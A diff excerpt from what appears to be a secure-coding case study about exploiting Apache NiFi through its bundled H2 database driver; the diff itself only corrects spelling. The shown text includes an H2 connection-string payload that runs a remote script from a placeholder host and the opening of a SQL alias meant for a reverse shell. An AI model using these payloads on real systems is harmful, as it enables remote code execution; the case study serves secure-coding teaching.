mitre/secure-coding-case-studies/java/msccs-13.md

 |Database Driver Class Name | `org.h2.Driver` |
 |Database Driver Location | `work/nar/extensions/nifi-poi-nar-1.21.0.nar-unpacked/NAR-INF/bundled-dependencies/h2-2.1.214.jar` |

-**NOTE: The `Database Connection URL` can be given an initalization script to automatically create and execute the malicous java code (`INIT=RUNSCRIPT FROM "http://{REMOTE-HOST}"`)**
+**NOTE: The `Database Connection URL` can be given an initialization script to automatically create and execute the malicious java code (`INIT=RUNSCRIPT FROM "http://{REMOTE-HOST}"`)**

 Now any processor configured to use the `DBCPConnectionPool` will utilize the underlying embedded H2 database driver when connections are requested.
-Now malicious UDFs can be created an executed on the advarsary's command.
+Now malicious UDFs can be created an executed on the adversary's command.
 The following is an example exploitation via a reverse shell:

 ```sql
 CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.Exception {